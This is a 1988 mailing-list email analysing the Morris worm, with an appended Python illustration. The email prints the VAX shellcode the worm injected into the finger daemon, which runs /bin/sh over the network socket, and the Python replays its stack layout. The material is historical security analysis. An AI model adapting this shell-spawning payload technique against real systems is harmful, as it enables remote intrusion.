From: Bill Sommerfeld
To: phage
Subject: virus guts.
Date: Fri, 4 Nov 88 00:50:23 EST

The code which is inserted into finger is rather simple:

	mcount+70:	pushl	$68732f		'/sh'
	mcount+76:	pushl	$6e69622f	'/bin'
	mcount+7c:	movl	sp,r10
	mcount+7f:	pushl	$0
	mcount+81:	pushl	$0
	mcount+83:	pushl	r10
	mcount+85:	pushl	$3
	mcount+87:	movl	sp,ap
	mcount+8a:	chmk	$3b		(execve)

For those of you who can't read vax assembler, this does up an "execve", with no arguments, of /bin/sh; since this is run in the context of the finger daemon, stdin and stdout are connected to the network socket...

From disassembling the code, it looks like the programmer is really anally retentive about checking return codes, and, in addition, prefers to use array indexing instead of pointers to walk through arrays.

- Bill
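The stack effect of the listing above, replayed as an added Python illustration (not part of Bill's message) of why the two immediates form "/bin/sh" on a little-endian, downward-growing VAX stack and what argument frame chmk $3b receives; STACK_TOP and the helper names are constructed for the illustration.

```python
# Added illustration: a sparse model of VAX stack memory (32-bit, little-endian,
# stack grows toward lower addresses) used to replay the nine instructions.
import struct

STACK_TOP = 0x7FFFF000  # constructed starting sp value; any address works


def run_listing(sp=STACK_TOP):
    """Replay the listing and return the argument frame execve would see."""
    mem = {}        # address -> byte, a sparse model of stack memory
    regs = {"sp": sp, "r10": 0, "ap": 0}

    def pushl(value):
        # pushl: decrement sp by 4, store the longword little-endian at sp
        regs["sp"] -= 4
        for i, b in enumerate(struct.pack("<I", value & 0xFFFFFFFF)):
            mem[regs["sp"] + i] = b

    def read_long(addr):
        return struct.unpack("<I", bytes(mem[addr + i] for i in range(4)))[0]

    def read_cstring(addr):
        out = bytearray()
        while mem.get(addr, 0) != 0:
            out.append(mem[addr])
            addr += 1
        return bytes(out)

    pushl(0x68732F)            # bytes 2f 73 68 00 -> "/sh" plus NUL
    pushl(0x6E69622F)          # bytes 2f 62 69 6e -> "/bin", directly below
    regs["r10"] = regs["sp"]   # movl sp,r10: r10 now points at "/bin/sh\0"
    pushl(0)                   # envp = NULL
    pushl(0)                   # argv = NULL ("with no arguments")
    pushl(regs["r10"])         # path
    pushl(3)                   # argument count for the chmk call
    regs["ap"] = regs["sp"]    # movl sp,ap: ap -> [count, path, argv, envp]

    ap = regs["ap"]
    return {
        "argc": read_long(ap),
        "path": read_cstring(read_long(ap + 4)),
        "argv": read_long(ap + 8),
        "envp": read_long(ap + 12),
    }
```

The returned frame is what the kernel reads through ap when chmk $3b dispatches syscall 59, execve.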